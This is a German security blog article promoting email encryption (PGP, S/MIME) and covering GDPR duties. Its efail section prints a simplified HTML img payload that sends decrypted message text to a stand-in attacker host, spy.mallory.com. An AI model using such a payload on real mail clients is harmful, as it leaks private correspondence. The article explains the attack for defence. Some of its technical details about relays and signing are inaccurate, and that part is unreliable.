/ Summary
Die E-Mail, die Sie senden, wird so lange über verschiedene andere Computer weitergeleitet, bis sie im Postfach des Empfängers angekommen ist. Dabei verfügt die E-Mail selbst über keinen Schutz nach aussen, der es verhindert, dass jeder, der diese E-Mail weiterleitet diese auch lesen kann. Natürlich werden die E-Mails nicht über die Computer von Tante Emma oder Onkel Heinz weitergeleitet, sondern über E-Mail-Server, die im globalen Netzwerk dafür eingebunden wurden. Aber dennoch kann es sich dabei um 2, 5, 10 oder auch 50 Server handeln, die Ihre E-Mails empfangen und weiterleiten und zwischen diesen zwei Tätigkeiten die E-Mail, samt all Ihrer Anhänge, lesen, indexieren, auswerten und Kopien an Dritte weitersenden. Deshalb wird die E-Mail auch als „Postkarte des Internets“ bezeichnet.
Nehmen wir an Alice sendet Bob eine E-Mail. Sie schreibt diese auf Ihrem Computer, verbindet sich mit Ihrem E-Mail-Anbieter und die E-Mail wurde gesendet. Die Verbindung von Alice Computer bis zum E-Mail-Server ihres Anbieters ist via SSL verschlüsselt. Dabei handelt es sich um die Transportverschlüsselung, die ermöglicht, dass der Transfer von Alice zu ihrem E-Mail-Anbieter sicher transferiert wird, ohne dass Dritte einsehen können, was Alice an ihren Anbieter überträgt. Schon hier begibt sich Alice in das Vertrauen ihres E-Mail-Anbieters, denn dieser kann jetzt, nachdem die E-Mail zu ihm übertragen wurde, die E-Mail vollumfänglich lesen. Alice möchte aber ihrem Anbieter vertrauen und davon ausgehen, dass dieser als seriöser Anbieter nicht ihre E-Mails lesen oder weitergeben wird.
Fahren wir fort: Ihr Anbieter ist darum bemüht die E-Mail an Bob zuzustellen. Dafür wird sie an den Anbieter von Bob adressiert zum nächstbesten
Weiterleitungsserver gesendet mit der Bitte die E-Mail zu Bob zu bringen. Das Internet besteht aus Millionen solcher Weiterleitungsservern – ein vermaschtes Netzwerk. Dieser Weiterleitungsserver speichert die E-Mail und sendet sie weiter an den nächsten, damit dieser Bob die E-Mail zustellt.
Bereits ab dem ersten Weiterleitungsserver ist keine Transportverschlüsselung mehr gegeben. Die E-Mail liegt nun für die Möglichkeit des Abhörens offen. Doch das stört uns nicht so sehr wie die Tatsache, dass Alice vertrauenswürdiger E-Mail-Anbieter die E-Mail nicht an Bob, sondern an einen uns unbekannten Dritten weitergibt. Wer steckt dahinter? Ist der Anbieter des Weiterleitungsservers seriös? Sitzt er in unserem Land oder am anderen Ende der Welt? Ist dessen Server sicher gegen Hacker? Wir wissen es nicht.
Einfach so Emails verschicken ist wie eine Postkarte zu schreiben; jeder der sie mal in der Hand hatte, weiss was drauf steht. Nur nicht mit ein paar Postbeamten, sondern weltweit, vollautomatisiert und unlöschbar.
Die E-Mail wird nun über verschiedene Server weitergeleitet. Einer von Ihnen ist der Server von Mallory, unserem „Bösewicht“. Er sitzt in seinem Sessel und beobachtet den Internetverkehr, der über seinen Server läuft, wobei er nach interessanten Daten Ausschau hält. Dabei legt er von jeder eingehenden E-Mail eine Kopie an, speichert sie auf seinen Festplatten und leitet die E-Mail direkt zum nächsten Weiterleitungsserver weiter.
Die E-Mail kommt schliesslich auf dem Server von Bobs E-Mail-Anbieter an. Bob ruft diese über die sichere Verbindung via SSL von seinem Anbieter ab und liesst sie nun auf seinem Computer.
Der Versand der E-Mail kann bei jedem Versuch einen anderen Weg nehmen. Es ist daher nie gewährleistet, dass Alice E-Mails eine bestimmte Route gehen.
Die Sicherheit der E-Mails wird häufig unterschätzt, weil es nicht greifbar ist. Einige Beispiele, die Ihre Vorstellungskraft anregen sollen:
Identitätsdiebstahl
Sie senden Zugangsdaten zu einem Online-Shop mit E-Mail und Passwort via E-Mail. Ein Angreifer kann diese Daten mitlesen, sich mittels Ihrer Daten anmelden, Ihre dort eingegebenen Adress- und Zahlungsdaten auslesen sowie Bestellungen in Ihrem Namen an dritte Lieferanschriften – oder ggf. sogar Gutscheine digital – ausführen. Alternatives Szenario: Sie legen Ihren Reisepass in den Multifunktionsdrucker und lassen sich diesen von dort aus „bequem“ einscannen sowie via E-Mail zusenden. Diese E-Mail geht ebenso den weltweiten Weg und Ihr Reisepass liegt als Kopie verstreut auf der halben Welt. Kopien von Reisepässen werden unter anderem im „Darknet“ gehandelt, um damit eine fremde Identität vorzugeben.
Social Engeneering
Sie senden eine E-Mail an Ihren Chef/Mitarbeiter mit der Bitte etwas auszuführen. Ein Angreifer kann Ihre E-Mails nutzen, um zu verstehen und zu rekonstruieren, wie in Ihrem Unternehmen miteinander kommuniziert wird. Sodann kann er E-Mails unter Ihrem Namen oder unter dem Namen Ihres Chefs/Mitarbeiters schreiben. Spitznamen, Grussformeln, Anreden oder Schreibstile können so eine Manipulation ermöglichen Dinge zu tun, die Sie für einen Fremden nicht getan hätten. Der sogenannte CEO-Fraud wird so realisiert, in der Mitarbeiter der Buchhaltung vom „Chef“ gebeten werden Überweisungen ins Ausland zu tätigen.
Nachrichtenmanipulation
Da die Nachricht im Klartext bei den Servern ankommt, kann diese manipuliert weitergesendet werden. Nehmen Sie an Sie senden eine E-Mail mit Bitte um Zahlung auf Ihr Konto und der Angreifer wechselt die IBAN/BIC aus, bevor die E-Mail beim Empfänger ankommt. Es bleibt Ihre E-Mail aus Sicht des Empfängers.
Angreifbar durch Hacker
Wo auch immer die E-Mail gespeichert wurde – ob bei Mallory oder einem „seriösen“ Weiterleitungsserver – so ist es für Hacker denkbar einen Weiterleitungsserver zu knacken und dort alle gespeicherten E-Mails auszulesen. So können auch noch über Jahre hinweg alte E-Mails beschafft und benutzt werden.
Fehlende Anerkenntnis
Eine normale E-Mail gilt nicht als eine Nachricht, dessen Quelle nachweisbar ist. Jeder hätte diese Nachricht erfinden und zustellen können. So könnte auch jeder Ihrer E-Mail-Kommunikationspartner behaupten er habe diese E-Mail nicht gesendet.
Sie dürfen aufatmen: Sie müssen kein Ass in Mathe gewesen sein, um asymetrische Kryptographie zu nutzen. Diese Art der Verschlüsselung ermöglicht es E-Mails sicher zu versenden und alle obigen Herausforderungen zu lösen. Wie funktioniert asymetrische Kryptographie nun?
Asymetrische Kryptographie funktioniert so, dass es einen anderen Schlüssel zum Verschlüsseln als zum Entschlüsseln gibt. So kann Alice die Nachricht mittels Bobs öffentlichem Schlüssel so verschlüsseln, dass nur Bob diese Nachricht wiederum mit seinem privaten Schlüsseln öffnen kann.
Alice und Bob legen sich jeweils ein eigenes Schlüsselpaar mit einem öffentlichem sowie einem privaten Schlüssel an. Alice und Bob senden sich nun gegenseitig ihre öffentlichen
Schlüssel zu. Als nächstes nimmt Alice die E-Mail und verschlüsselt sie mit ihrem eigenen privaten Schlüssel sowie Bobs öffentlichem Schlüssel. Daraus resultiert eine E-Mail die nur mit Alice oder Bobs privatem Schlüssel gelesen werden kann. Weiterhin ist damit sichergestellt, dass Alice als Absender hervorgeht. Der Angreifer, Mallory, kann die E-Mail so nicht mehr einsehen oder fälschen, da ihm die privaten Schlüssel fehlen.
I‘m free, secure and available worldwide. Use me.
PGP:
Pretty Good Privacy ist auch der Grundsatz, der sich hinter der Abkürzung verbirgt. PGP ist ein kostenfreies OpenSource-Verschlüsselungsverfahren, welches dezentral fungiert. Aufgrund der Unabhängigkeit von Zentralisierungen ist PGP eine klare Empfehlung.
S/MIME:
Das S/MIME-Konzept folgt einem offiziellen Standard und basiert auf Zertifikaten, die von offiziellen Stellen (wie Commodo, VeriSign, etc.) ausgestellt werden. Die Schlüsselvergabe sollte dabei unbedingt auf dem Rechner des Anwenders geschehen. Der Vorteil von S/MIME besteht in der breiteren Integrationsmöglichkeit in E-Mail-Programmen und Mobiltelefonen sowie in der Möglichkeit Dokumente rechtssicher schriftlich per E-Mail versenden zu können, sofern ein Zertifikat der Klasse 3 bezogen wurde.
Seit der NSA-Affären (Blogartikel aus 2014) gelten viele gängige Verschlüsselungsverfahren offiziell als nicht mehr sicher, da in verschiedenen Ebenen mutmasslich Hintertüren eingebaut wurden, die mindestens von Geheimdiensten genutzt werden.
In der Regel integrieren sich die Verfahren nach Erstinstallation automatisiert in den Ablauf; Nachrichten werden automatisch oder per Knopfdruck ver- und entschlüsselt.
Hinweis: Bei der Verschlüsselung via PGP und S/MIME werden nur der Inhalt (mit Anhängen), nicht aber die Meta-Daten verschlüsselt. Es bleiben weiterhin öffentlich: E-Mail des Empfängers, E-Mail des Absenders, Datum der Nachricht und Betreff. Achten Sie darauf keine personenbezogenen, sensiblen Daten in den Betreff zu schreiben.
S/MIME: Sie benötigen hierzu als allererstes ein Zertifikat. Sie erhalten ein kostenloses Klasse 1 oder Klasse 3 Zertifikat bei Comodo oder über Anbieter wie PSW.net. Die Anbieter liefern Ihnen bei Beantragung des Zertifikats eine Anleitung zur Installation.
PGP: Als Windows-Nutzer beziehen Sie OpenPGP oder Gpg4win. Sind Sie Macintosh-Nutzer, so steht Ihnen die GPG-Suite offen. Nach Installation erstellen Sie Ihr Schlüsselpaar.
Den öffentlichen Schlüssel können Sie an Ihre Kommunikationspartner versenden oder auf Ihrer Website zum Download anbieten. So kann jeder, der mit Ihnen schon von der ersten E-Mail an verschlüsselt kommunizieren möchte, sich vorab den öffentlichen Schlüssel herunterladen. Ansonsten wird üblicherweise in der ersten E-Mail der öffentliche Schlüssel mitgesendet, sodass in einer zweiten E-Mail verschlüsselt gesendet werden kann. Die E-Mail-Programme verhalten sich hier sehr unterschiedlich. Das Apple iPhone Mail erfordert die manuelle Zertifikat-Installation bei S/MIME und läuft damit nicht ganz ohne zutun, ermöglicht jedoch von Haus aus das S/MIME-Verfahren.
Nach obiger Erläuterung werden Sie sich sicher nicht Ihre wertvollen Zertifikate und privaten Schlüssel unverschlüsselt per E-Mail selbst zusenden, um sich diese auf dem Telefon zu installieren. Ihre Kommunikation wäre damit schon noch vor Beginn kompromittiert. Kopieren Sie die Zertifikate über Ihren Computer direkt per Kabel auf das Telefon.
Wie funktioniert efaiI? Das Konzept von efail baut auf der Integration der E-Mail-Klienten, die verschlüsselte E-Mails automatisch entschlüsseln. Soweit gibt es nichts einzuwenden, wäre da nicht auch noch HTML. Die Kombination automatischer Entschlüsselung sowie dem Ausführen von HTML-Code macht es mittels Modifizierung der Ursprungsnachricht möglich den Inhalt der gesendeten E-Mail an den Angreifer zu übertragen. Was braucht der Angreifer dafür? Zu erst einmal muss der Angreifer Ihre verschlüsselte E-Mail mitgeschnitten und vorliegen haben. Diese E-Mail wird nun aufgeteilt und vor als auch nach dem verschlüsselten Teil werden jeweils ein weiterer HTML-Block hinzugefügt, der eine Grafik lädt. Ein vereinfachtes Beispiel:
<img src="http://spy.mallory.com/
%%%MITPGPVERSCHLÜSSELTENACHRICHT: WZ4Ÿ&ÃÏWÃ4â2ëö∂ñàŒÆ≈Ôfll’"5ÇOæÆ®06*µ...%%%
"/>
Das Ergebnis ist, dass die Nachricht entschlüsselt und das HTML ausgeführt wird. Da die Nachricht innerhalb des Attributes „src“ einer Grafik aufgerufen wird, wandelt die E-Mail-Software diesen Text in ein URL-kodiertes Format um.
Ein Leerzeichen wird zu +
oder ein Zeilenumbruch zu %2C
konvertiert. Die folgende Grafik wird versuchen aufgerufen zu werden.
<img src="http://spy.mallory.com/Hallo+Bob%2C%0Awir+treffen+uns+morgen+um+20+Uhr%21%0AViele+Gr%C3%BC%C3%9Fe%0AAlice"/>
Der Angreifer kann nun auf spy.mallory.com einen „Seiten-Aufruf“ sehen, der ihm Verrät: „Hallo Bob, wir treffen uns morgen um 20 Uhr! Viele Grüsse Alice„. Es ist somit allerdings notwendig, dass der Angreifer den Zugriff auf die verschlüsselte E-Mail verfügt, weiterhin Ihnen die E-Mail abgewandelt per E-Mail zustellt und Sie diese vom Angreifer abgewandelte E-Mail dann öffnen. Software-Lösungen wie GPG-Suite für Mac haben bereits an der Schließung dieser Sicherheitslücke gearbeitet.
Schon vorher hat das BDSG (Bundesdatenschutzgesetz) die E-Mail-Verschlüsselung empfohlen, indem personenbezogene Daten sicher zu übertragen sind. Seit der Einführung der DSGVO (Datenschutz-Grundverordnung) am 25. Mai 2018 wurden diese Richtlinien noch einmal verschärft und auf europäische Ebene gestellt. Auch wurden die Bussgelder auf ein empfindliches Mass angehoben: So sieht der Verstoss Strafen bis 20 Mio. Euro oder 4% des Jahresumsatzes (des Mutterkonzerns) vor. Die Verschlüsselung von personenbezogenen Daten wird im Artikel 32 DSGVO vorgeschrieben, was auch die E-Mail-Verschlüsselung beinhaltet.
Mit obigem Wissen, dass alle unverschlüsselten E-Mails verstreut auf Servern von Anbietern, dessen Namen wir nicht kennen, noch einen Vertrag haben, in verschiedenen Ländern der Welt gespeichert werden und Zugriff auf unsere Daten haben, kommen wir zu dem Ergebnis, dass das Versenden einer personenbezogenen E-Mail ohne Verschlüsselung im geschäftlichen Umfeld per Konzept einem Datenschutz-Verstoss gleichkommt, da grob fahrlässig, wenn nicht sogar vorsätzlich, das Kopieren, Einsehen und Analysieren – das Kompromittieren – der personenbezogenen Daten in Kauf genommen wird.
Transportverschlüsselung (SSL) wird im aktuellen öffentlich Rechtsverständnis häufig als ausreichend betrachtet. Dies ist allerdings auf Basis der Erläuterungen in diesem Artikel nur auf fehlendes Verständnis des tatsächlichen technischen Ablaufs zurückzuführen.
Weiterhin sind Sie sogar mittels Artikel 33 und Artikel 34 der DSGVO verpflichtet Datenschutzverletzungen der Aufsichtsbehörde zu melden. Manche Rechtsauffassungen gehen hier auseinander und sagen, dass kein Eigenverschulden stattgefunden hat, da sich ein Angreifer illegal Zugriff auf die Daten beschaffen müsste. Das kann aufgrund der Netzwerkstruktur nicht einmal bestätigt werden, denn Gesetze sind in jedem Land anders. Der Geheimdienst der USA, die NSA, verfügt mit PRISM über Systeme allen Datenverkehr aufzuzeichnen, der mit ihnen in Berührung kommt. Der Zugriff ist in diesem Fall auf amerikanischem Raum legal, aber nicht auf Deutschem. Doch darum geht es bei der DSGVO nicht, denn Sie müssen verhindern, dass es überhaupt möglich ist, dass personenbezogene Daten verarbeitet werden könnten. Ähnliche Aktivitäten sind übrigens auch beim britischen GCHQ zu finden.
E-Mails transportieren viel zu wichtige Daten, als Sie unverschlüsselt zu versenden. Hacker können Sie einsehen, verkaufen oder gegen Sie verwenden und sie sind nicht rechtens im Rahmen der DSGVO. Die einzige Lösung hierzu stellt die Verschlüsselung der E-Mail dar.
Über den Autor
Ein erfahrener Unternehmer und Certified Ethical Hacker, der seit 18 Jahren erfolgreich mehrere Digitalagenturen führt. Seine Expertise erstreckt sich über Software-, Web- und App-Entwicklung, kombiniert mit einem reichen Schatz an technischem Wissen und einem starken Fokus auf innovative Cyber-Sicherheitslösungen. Mit einem tiefen Verständnis für die Dynamik der IT-Branche verbindet er technische Kompetenz mit unternehmerischer Vision.
News +
Insights
29. Juli 2024
24. März 2024
2. Februar 2024